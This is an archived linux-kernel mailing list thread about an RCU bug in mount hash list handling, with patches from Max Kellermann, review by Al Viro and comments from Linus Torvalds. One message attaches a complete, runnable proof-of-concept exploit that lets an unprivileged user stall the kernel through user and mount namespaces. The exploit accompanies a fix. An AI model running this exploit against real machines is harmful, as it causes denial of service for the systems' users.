[PATCH 1/2] fs/namespace: don't clobber mnt

public inbox for linux-kernel@vger.kernel.org
 help / color / mirror / Atom feed

* [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
@ 2014-03-19 21:22 Max Kellermann
  2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
                   ` (2 more replies)
  0 siblings, 3 replies; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
  To: viro; +Cc: max, linux-kernel

mount.mnt_hash is RCU-protected.  However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.

The right way to delete items from a RCU-protected list is
list_del_rcu().  Before the item is inserted into another list
(completing the list_move), synchronize_rcu() must be called.

umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call.  This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.

In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).

The fix is to avoid reusing "mnt_hash".  This patch adds a new
list_head attribute dedicated for umounting.  This avoids clobbering
mnt_hash.next, allowing all rcu_locked threads to continue walk the
list until namespace_unlock() is called.

This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.

Signed-off-by: Max Kellermann <mk@cm4all.com>
---
 fs/mount.h     |    1 +
 fs/namespace.c |   12 +++++++-----
 fs/pnode.c     |    8 +++++---
 3 files changed, 13 insertions(+), 8 deletions(-)

diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
 	int mnt_count;
 	int mnt_writers;
 #endif
+	struct list_head mnt_unmounted;	/* list of mounts being unmounted */
 	struct list_head mnt_mounts;	/* list of children, anchored here */
 	struct list_head mnt_child;	/* and going through their mnt_child */
 	struct list_head mnt_instance;	/* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
 	synchronize_rcu();

 	while (!list_empty(&head)) {
-		mnt = list_first_entry(&head, struct mount, mnt_hash);
-		list_del_init(&mnt->mnt_hash);
+		mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+		list_del_init(&mnt->mnt_unmounted);
 		if (mnt->mnt_ex_mountpoint.mnt)
 			path_put(&mnt->mnt_ex_mountpoint);
 		mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
 	LIST_HEAD(tmp_list);
 	struct mount *p;

-	for (p = mnt; p; p = next_mnt(p, mnt))
-		list_move(&p->mnt_hash, &tmp_list);
+	for (p = mnt; p; p = next_mnt(p, mnt)) {
+		list_del_rcu(&p->mnt_hash);
+		list_add(&p->mnt_unmounted, &tmp_list);
+	}

 	if (how)
 		propagate_umount(&tmp_list);

-	list_for_each_entry(p, &tmp_list, mnt_hash) {
+	list_for_each_entry(p, &tmp_list, mnt_unmounted) {
 		list_del_init(&p->mnt_expire);
 		list_del_init(&p->mnt_list);
 		__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..4bca573 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
 		 * umount the child only if the child has no
 		 * other children
 		 */
-		if (child && list_empty(&child->mnt_mounts))
-			list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+		if (child && list_empty(&child->mnt_mounts)) {
+			list_del_rcu(&child->mnt_hash);
+			list_add(&child->mnt_unmounted, &mnt->mnt_hash);
+		}
 	}
 }

@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
 {
 	struct mount *mnt;

-	list_for_each_entry(mnt, list, mnt_hash)
+	list_for_each_entry(mnt, list, mnt_unmounted)
 		__propagate_umount(mnt);
 	return 0;
 }

^ permalink raw reply related	[flat|nested] 9+ messages in thread

* [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash
  2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
@ 2014-03-19 21:22 ` Max Kellermann
  2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
  2014-03-19 21:37 ` Max Kellermann
  2 siblings, 0 replies; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:22 UTC (permalink / raw)
  To: viro; +Cc: max, linux-kernel

mount.mnt_hash is RCU-protected, and therefore we must use the RCU
variants to manipulate the list.

Signed-off-by: Max Kellermann <mk@cm4all.com>
---
 fs/namespace.c |    9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/fs/namespace.c b/fs/namespace.c
index 2aa0a14..295a0c0 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -22,6 +22,7 @@
 #include <linux/fsnotify.h>	/* fsnotify_vfsmount_delete */
 #include <linux/uaccess.h>
 #include <linux/proc_ns.h>
+#include <linux/rculist.h>
 #include <linux/magic.h>
 #include "pnode.h"
 #include "internal.h"
@@ -739,8 +740,8 @@ static void attach_mnt(struct mount *mnt,
 			struct mountpoint *mp)
 {
 	mnt_set_mountpoint(parent, mp, mnt);
-	list_add_tail(&mnt->mnt_hash, mount_hashtable +
-			hash(&parent->mnt, mp->m_dentry));
+	list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable +
+			  hash(&parent->mnt, mp->m_dentry));
 	list_add_tail(&mnt->mnt_child, &parent->mnt_mounts);
 }
 
@@ -762,8 +763,8 @@ static void commit_tree(struct mount *mnt)
 
 	list_splice(&head, n->list.prev);
 
-	list_add_tail(&mnt->mnt_hash, mount_hashtable +
-				hash(&parent->mnt, mnt->mnt_mountpoint));
+	list_add_tail_rcu(&mnt->mnt_hash, mount_hashtable +
+			  hash(&parent->mnt, mnt->mnt_mountpoint));
 	list_add_tail(&mnt->mnt_child, &parent->mnt_mounts);
 	touch_mnt_namespace(n);
 }


^ permalink raw reply related	[flat|nested] 9+ messages in thread

* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
  2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
  2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
@ 2014-03-19 21:24 ` Max Kellermann
  2014-03-19 21:37 ` Max Kellermann
  2 siblings, 0 replies; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:24 UTC (permalink / raw)
  To: viro, linux-kernel

[-- Attachment #1: Type: text/plain, Size: 250 bytes --]

On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote:
> In the presence of user+mount namespaces, this bug can be exploited by
> any unprivileged user to stall the kernel (denial of service by soft
> lockup).

Proof-of-concept exploit attached.

[-- Attachment #2: rcumount.c --]
[-- Type: text/x-csrc, Size: 1878 bytes --]

/*
 * Exploit for linux commit 48a066e72d970a3e225a9c18690d570c736fc455:
 * endless loop in __lookup_mnt() because the mount_hashtable does not
 * have enough RCU protection.
 *
 * How to use:
 *
 *   gcc -D_GNU_SOURCE -std=gnu99 -o rcumount rcumount.c && ./rcumount
 *
 * Wait a few minutes until "rcu_sched self-detected stall" appears.
 * The machine is now unusable.
 *
 * Author: Max Kellermann <max@duempel.org>
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sched.h>
#include <sys/mount.h>
#include <sys/stat.h>

static void stress(void) {
    /* make all mounts private so our namespace "owns" them */
    mount(NULL, "/", NULL, MS_PRIVATE|MS_REC, NULL);

    while (1) {
        /* stress the mount_hashtable which will at some point modify
           a list_head which is rcu-protected but still referenced by
           another kernel thread; this may or may not lead this other
           kernel thread into an endless loop inside __lookup_mnt()
           never sees the head again */
        if (mount("none", "/tmp", "tmpfs", 0, "size=16M,nr_inodes=256") == 0)
            umount2("/tmp", MNT_DETACH);

        /* ask the kernel to walk the mount hash, which may trigger
           the __lookup_mnt() */
        struct stat st;
        stat("/tmp/..", &st);
    }
}

static int fn(void *arg) {
    (void)arg;

    /* launch child processes */
    for (unsigned i = 0; i < 32; ++i) {
        if (fork() == 0) {
            stress();
            exit(0);
        }
    }

    /* cleanup */
    int status;
    do {} while(wait(&status) > 0);
    return 0;
}

int main(int argc, char **argv) {
    /* create a new user+vfs namespace which allows us to mount() */
    char stack[65536];
    clone(fn, stack + sizeof(stack), SIGCHLD|CLONE_NEWNS|CLONE_NEWUSER, NULL);

    /* cleanup */
    int status; wait(&status);
}

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting
  2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
  2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
  2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
@ 2014-03-19 21:37 ` Max Kellermann
  2014-03-19 21:39   ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann
  2 siblings, 1 reply; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:37 UTC (permalink / raw)
  To: viro; +Cc: linux-kernel

On 2014/03/19 22:22, Max Kellermann <mk@cm4all.com> wrote:
> +			list_add(&child->mnt_unmounted, &mnt->mnt_hash);

This is obviously a bug in my patch, sorry.  Will resend a fixed
patch.

^ permalink raw reply	[flat|nested] 9+ messages in thread

* [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
  2014-03-19 21:37 ` Max Kellermann
@ 2014-03-19 21:39   ` Max Kellermann
  2014-03-20  3:48     ` Al Viro
  0 siblings, 1 reply; 9+ messages in thread
From: Max Kellermann @ 2014-03-19 21:39 UTC (permalink / raw)
  To: viro; +Cc: max, linux-kernel

mount.mnt_hash is RCU-protected.  However, list_move() breaks RCU
protection: when one thread walks the linked list while another calls
list_move(), it may "redirect" the first thread into the new list,
making it loop endlessly in __lookup_mnt(), because the list head is
never found.

The right way to delete items from a RCU-protected list is
list_del_rcu().  Before the item is inserted into another list
(completing the list_move), synchronize_rcu() must be called.

umount_tree() has code to implement this kind of protection; it moves
the "mount" object to the global list "unmounted", to be cleaned up by
namespace_unlock() after a synchronize_rcu() call.  This however did
not work because umount_tree() reused the "mnt_hash" attribute for the
"unmounted" list.

In the presence of user+mount namespaces, this bug can be exploited by
any unprivileged user to stall the kernel (denial of service by soft
lockup).

The fix is to avoid reusing "mnt_hash".  This patch adds a new
list_head attribute dedicated for umounting.  This avoids clobbering
mnt_hash.next, allowing all rcu_locked threads to continue walk the
list until namespace_unlock() is called.

This regression was caused by commit 48a066e7 ("RCU'd vfsmounts").
All releases since 3.12-rc5 are affected.

Signed-off-by: Max Kellermann <mk@cm4all.com>
---
 fs/mount.h     |    1 +
 fs/namespace.c |   12 +++++++-----
 fs/pnode.c     |    8 +++++---
 3 files changed, 13 insertions(+), 8 deletions(-)

diff --git a/fs/mount.h b/fs/mount.h
index a17458c..9cfdf94 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -36,6 +36,7 @@ struct mount {
 	int mnt_count;
 	int mnt_writers;
 #endif
+	struct list_head mnt_unmounted;	/* list of mounts being unmounted */
 	struct list_head mnt_mounts;	/* list of children, anchored here */
 	struct list_head mnt_child;	/* and going through their mnt_child */
 	struct list_head mnt_instance;	/* mount instance on sb->s_mounts */
diff --git a/fs/namespace.c b/fs/namespace.c
index 338ccc2..2aa0a14 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -1171,8 +1171,8 @@ static void namespace_unlock(void)
 	synchronize_rcu();

 	while (!list_empty(&head)) {
-		mnt = list_first_entry(&head, struct mount, mnt_hash);
-		list_del_init(&mnt->mnt_hash);
+		mnt = list_first_entry(&head, struct mount, mnt_unmounted);
+		list_del_init(&mnt->mnt_unmounted);
 		if (mnt->mnt_ex_mountpoint.mnt)
 			path_put(&mnt->mnt_ex_mountpoint);
 		mntput(&mnt->mnt);
@@ -1196,13 +1196,15 @@ void umount_tree(struct mount *mnt, int how)
 	LIST_HEAD(tmp_list);
 	struct mount *p;

-	for (p = mnt; p; p = next_mnt(p, mnt))
-		list_move(&p->mnt_hash, &tmp_list);
+	for (p = mnt; p; p = next_mnt(p, mnt)) {
+		list_del_rcu(&p->mnt_hash);
+		list_add(&p->mnt_unmounted, &tmp_list);
+	}

 	if (how)
 		propagate_umount(&tmp_list);

-	list_for_each_entry(p, &tmp_list, mnt_hash) {
+	list_for_each_entry(p, &tmp_list, mnt_unmounted) {
 		list_del_init(&p->mnt_expire);
 		list_del_init(&p->mnt_list);
 		__touch_mnt_namespace(p->mnt_ns);
diff --git a/fs/pnode.c b/fs/pnode.c
index c7221bb..c16c5d64 100644
--- a/fs/pnode.c
+++ b/fs/pnode.c
@@ -338,8 +338,10 @@ static void __propagate_umount(struct mount *mnt)
 		 * umount the child only if the child has no
 		 * other children
 		 */
-		if (child && list_empty(&child->mnt_mounts))
-			list_move_tail(&child->mnt_hash, &mnt->mnt_hash);
+		if (child && list_empty(&child->mnt_mounts)) {
+			list_del_rcu(&child->mnt_hash);
+			list_add(&child->mnt_unmounted, &mnt->mnt_unmounted);
+		}
 	}
 }

@@ -354,7 +356,7 @@ int propagate_umount(struct list_head *list)
 {
 	struct mount *mnt;

-	list_for_each_entry(mnt, list, mnt_hash)
+	list_for_each_entry(mnt, list, mnt_unmounted)
 		__propagate_umount(mnt);
 	return 0;
 }

^ permalink raw reply related	[flat|nested] 9+ messages in thread

* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
  2014-03-19 21:39   ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann
@ 2014-03-20  3:48     ` Al Viro
  2014-03-20  4:02       ` Linus Torvalds
  0 siblings, 1 reply; 9+ messages in thread
From: Al Viro @ 2014-03-20  3:48 UTC (permalink / raw)
  To: Max Kellermann; +Cc: max, linux-kernel, Linus Torvalds

On Wed, Mar 19, 2014 at 10:39:45PM +0100, Max Kellermann wrote:
> mount.mnt_hash is RCU-protected.  However, list_move() breaks RCU
> protection: when one thread walks the linked list while another calls
> list_move(), it may "redirect" the first thread into the new list,
> making it loop endlessly in __lookup_mnt(), because the list head is
> never found.

> The right way to delete items from a RCU-protected list is
> list_del_rcu().  Before the item is inserted into another list
> (completing the list_move), synchronize_rcu() must be called.

> The fix is to avoid reusing "mnt_hash".  This patch adds a new
> list_head attribute dedicated for umounting.  This avoids clobbering
> mnt_hash.next, allowing all rcu_locked threads to continue walk the
> list until namespace_unlock() is called.

NAK.  Nice catch, the bug is real, but the fix is wrong.  For one thing,
you have missed detach_mnt()/attach_mnt(), so you are not covering
all places where the sucker might be removed from the list.  For another,
I don't believe that this is the right approach.

The *only* thing we care about is not getting stuck in __lookup_mnt().  If
it misses an entry because something in front of it just got moved around,
etc., we are fine.  We'll notice that mount_lock mismatch and that'll be
it.

IOW, there are two problems here:
	(1) we can, indeed, get caught into an infinite loop.
	(2) __follow_mount_rcu() and follow_mount_rcu() ought to recheck
nd->m_seq and bugger off with ECHILD in case of mismatch (the latter probably
ought to be folded into follow_dotdot_rcu()).  legitimize_mnt() will fail
in the end of lookup *and* we are risking an incorrect hard error if we fail
to cross a mountpoint and continue under it.

I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
with that is __lookup_mnt_last().  That sucker is only called under
mount_lock, so RCU issues do not play there, but it's there and it
complicates things.  There might be a way to get rid of that thing for
good, but that's more invasive than what I'd be happy with for backports.

Let's just have __lookup_mnt() recheck mount_lock if it goes for too long -
e.g. every 256 iterations (and if the hash chain is that long, the price
of extra smp_rmb() + fetching seqcount won't matter anyway).  And have the
fs/namei.c callers check nd->m_seq properly (lookup_mnt() already does).
I've looked into taking the check into __lookup_mnt() itself, but it
leads to clumsier calling conventions and worse code in callers.

How about the following (completely untested yet):

diff --git a/fs/mount.h b/fs/mount.h
index 46790ae1..905d1bc 100644
--- a/fs/mount.h
+++ b/fs/mount.h
@@ -77,7 +77,7 @@ static inline int is_mounted(struct vfsmount *mnt)
 	return !IS_ERR_OR_NULL(real_mount(mnt)->mnt_ns);
 }
 
-extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *);
+extern struct mount *__lookup_mnt(struct vfsmount *, struct dentry *, unsigned seq);
 extern struct mount *__lookup_mnt_last(struct vfsmount *, struct dentry *);
 
 extern bool legitimize_mnt(struct vfsmount *, unsigned);
diff --git a/fs/namei.c b/fs/namei.c
index d6e32a1..458572b 100644
--- a/fs/namei.c
+++ b/fs/namei.c
@@ -1115,7 +1115,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path,
 		if (!d_mountpoint(path->dentry))
 			break;
 
-		mounted = __lookup_mnt(path->mnt, path->dentry);
+		mounted = __lookup_mnt(path->mnt, path->dentry, nd->m_seq);
 		if (!mounted)
 			break;
 		path->mnt = &mounted->mnt;
@@ -1129,20 +1129,7 @@ static bool __follow_mount_rcu(struct nameidata *nd, struct path *path,
 		 */
 		*inode = path->dentry->d_inode;
 	}
-	return true;
-}
-
-static void follow_mount_rcu(struct nameidata *nd)
-{
-	while (d_mountpoint(nd->path.dentry)) {
-		struct mount *mounted;
-		mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry);
-		if (!mounted)
-			break;
-		nd->path.mnt = &mounted->mnt;
-		nd->path.dentry = mounted->mnt.mnt_root;
-		nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
-	}
+	return read_seqretry(&mount_lock, nd->m_seq);
 }
 
 static int follow_dotdot_rcu(struct nameidata *nd)
@@ -1170,7 +1157,17 @@ static int follow_dotdot_rcu(struct nameidata *nd)
 			break;
 		nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
 	}
-	follow_mount_rcu(nd);
+	while (d_mountpoint(nd->path.dentry)) {
+		struct mount *mounted;
+		mounted = __lookup_mnt(nd->path.mnt, nd->path.dentry, nd->m_seq);
+		if (!mounted)
+			break;
+		nd->path.mnt = &mounted->mnt;
+		nd->path.dentry = mounted->mnt.mnt_root;
+		nd->seq = read_seqcount_begin(&nd->path.dentry->d_seq);
+		if (!read_seqretry(&mount_lock, nd->m_seq))
+			goto failed;
+	}
 	nd->inode = nd->path.dentry->d_inode;
 	return 0;
 
diff --git a/fs/namespace.c b/fs/namespace.c
index 203475b..72c20b0 100644
--- a/fs/namespace.c
+++ b/fs/namespace.c
@@ -599,16 +599,23 @@ bool legitimize_mnt(struct vfsmount *bastard, unsigned seq)
 
 /*
  * find the first mount at @dentry on vfsmount @mnt.
- * call under rcu_read_lock()
+ * call under rcu_read_lock().  seq is normally *not* checked - that's
+ * for the caller to deal with; here we are just breaking infinite loops.
+ * If we get hash chains longer than 256 elements, the price of extra
+ * smp_rmb() won't matter.
  */
-struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry)
+struct mount *__lookup_mnt(struct vfsmount *mnt, struct dentry *dentry, unsigned seq)
 {
 	struct list_head *head = m_hash(mnt, dentry);
 	struct mount *p;
+	unsigned char n = 0;
 
-	list_for_each_entry_rcu(p, head, mnt_hash)
+	list_for_each_entry_rcu(p, head, mnt_hash) {
+		if (unlikely(!--n) && !read_seqretry(&mount_lock, seq))
+			break;
 		if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry)
 			return p;
+	}
 	return NULL;
 }
 
@@ -652,7 +659,7 @@ struct vfsmount *lookup_mnt(struct path *path)
 	rcu_read_lock();
 	do {
 		seq = read_seqbegin(&mount_lock);
-		child_mnt = __lookup_mnt(path->mnt, path->dentry);
+		child_mnt = __lookup_mnt(path->mnt, path->dentry, seq);
 		m = child_mnt ? &child_mnt->mnt : NULL;
 	} while (!legitimize_mnt(m, seq));
 	rcu_read_unlock();

^ permalink raw reply related	[flat|nested] 9+ messages in thread

* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
  2014-03-20  3:48     ` Al Viro
@ 2014-03-20  4:02       ` Linus Torvalds
  2014-03-20  4:21         ` Al Viro
  0 siblings, 1 reply; 9+ messages in thread
From: Linus Torvalds @ 2014-03-20  4:02 UTC (permalink / raw)
  To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List

On Wed, Mar 19, 2014 at 8:48 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
>
> NAK.  Nice catch, the bug is real, but the fix is wrong.  For one thing,
> you have missed detach_mnt()/attach_mnt(), so you are not covering
> all places where the sucker might be removed from the list.  For another,
> I don't believe that this is the right approach.
>
> The *only* thing we care about is not getting stuck in __lookup_mnt().

Quite frankly, if that's the main issue, then may I suggest aiming to
use a 'hlist' instead of a doubly-linked list? Those have the
advantage that they are NULL-terminated.

Yeah, hlists have some disadvantages too, which might not make them
work in this case, but really, for mnt_hash? hlists are generally
*exactly* what you want for hash lists, because the head is smaller.
And because of the NULL termination rather than having the head used
in the middle of a circular list, you don't get the termination
problems when moving entries across chains.

I did not look whether there was some reason a hlist isn't appropriate
here. Maybe you can tell me. Or go "yeah, a hlist would work nicely".

                Linus

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
  2014-03-20  4:02       ` Linus Torvalds
@ 2014-03-20  4:21         ` Al Viro
  2014-03-20  4:58           ` Linus Torvalds
  0 siblings, 1 reply; 9+ messages in thread
From: Al Viro @ 2014-03-20  4:21 UTC (permalink / raw)
  To: Linus Torvalds; +Cc: Max Kellermann, max, Linux Kernel Mailing List

On Wed, Mar 19, 2014 at 09:02:33PM -0700, Linus Torvalds wrote:
> Quite frankly, if that's the main issue, then may I suggest aiming to
> use a 'hlist' instead of a doubly-linked list? Those have the
> advantage that they are NULL-terminated.
> 
> Yeah, hlists have some disadvantages too, which might not make them
> work in this case, but really, for mnt_hash? hlists are generally
> *exactly* what you want for hash lists, because the head is smaller.
> And because of the NULL termination rather than having the head used
> in the middle of a circular list, you don't get the termination
> problems when moving entries across chains.
> 
> I did not look whether there was some reason a hlist isn't appropriate
> here. Maybe you can tell me.

Er...  I have, actually, right in the part you've snipped ;-)

<unsnip>
I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
with that is __lookup_mnt_last().  That sucker is only called under
mount_lock, so RCU issues do not play there, but it's there and it
complicates things.  There might be a way to get rid of that thing for
good, but that's more invasive than what I'd be happy with for backports.
</unsnip>

hlist _is_ better, no questions there, but surgery required to deal with
__lookup_mnt_last()[1] is too invasive for backports and even more so -
for -final.  I would prefer to have the merge window happen after LSF/MM,
obviously, but I thought you wanted to open it this Sunday?

[1] that is, with cases like "/tmp/b is a slave of /tmp/a, bind foo on
/tmp/b/c, then bind bar on /tmp/a/c, then umount /tmp/a/c".  The only
kinda-sorta sane semantics we'd been able to come up with is what
we do right now and that's where __lookup_mnt_last() has come from.

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2]
  2014-03-20  4:21         ` Al Viro
@ 2014-03-20  4:58           ` Linus Torvalds
  0 siblings, 0 replies; 9+ messages in thread
From: Linus Torvalds @ 2014-03-20  4:58 UTC (permalink / raw)
  To: Al Viro; +Cc: Max Kellermann, max, Linux Kernel Mailing List

On Wed, Mar 19, 2014 at 9:21 PM, Al Viro <viro@zeniv.linux.org.uk> wrote:
>
> Er...  I have, actually, right in the part you've snipped ;-)

Heh. That's what I get for just reading the patch, and skimming the explanation.

> I would prefer to deal with (1) by turning mnt_hash into hlist; the problem
> with that is __lookup_mnt_last().  That sucker is only called under
> mount_lock, so RCU issues do not play there, but it's there and it
> complicates things.  There might be a way to get rid of that thing for
> good, but that's more invasive than what I'd be happy with for backports.

Yeah. I see what you're saying. That said, if we expect the mnt_hash
queues to be short (and they really should be), that whole
__lookup_mnt_last() could just be

    struct mount *p, *result = NULL;

    hlist_for_each_entry(p, head, mnt_hash)
        if (&p->mnt_parent->mnt == mnt && p->mnt_mountpoint == dentry)
            result = p;

    return result;

which is certainly simple.

Sure, it always walks the whole list, but as far as I can tell the
callers aren't exactly performance-critical, and we're talking about a
hlist that should be just a couple of entries in size..

So if that's the _only_ thing holding back using hlists, I'd say we
should just do the above trivial conversion.

             Linus

^ permalink raw reply	[flat|nested] 9+ messages in thread

end of thread, other threads:[~2014-03-20  4:58 UTC | newest]

Thread overview: 9+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2014-03-19 21:22 [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
2014-03-19 21:22 ` [PATCH 2/2] fs/namespace: use RCU list functions for mnt_hash Max Kellermann
2014-03-19 21:24 ` [PATCH 1/2] fs/namespace: don't clobber mnt_hash.next while umounting Max Kellermann
2014-03-19 21:37 ` Max Kellermann
2014-03-19 21:39   ` [PATCH] fs/namespace: don't clobber mnt_hash.next while umounting [v2] Max Kellermann
2014-03-20  3:48     ` Al Viro
2014-03-20  4:02       ` Linus Torvalds
2014-03-20  4:21         ` Al Viro
2014-03-20  4:58           ` Linus Torvalds

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox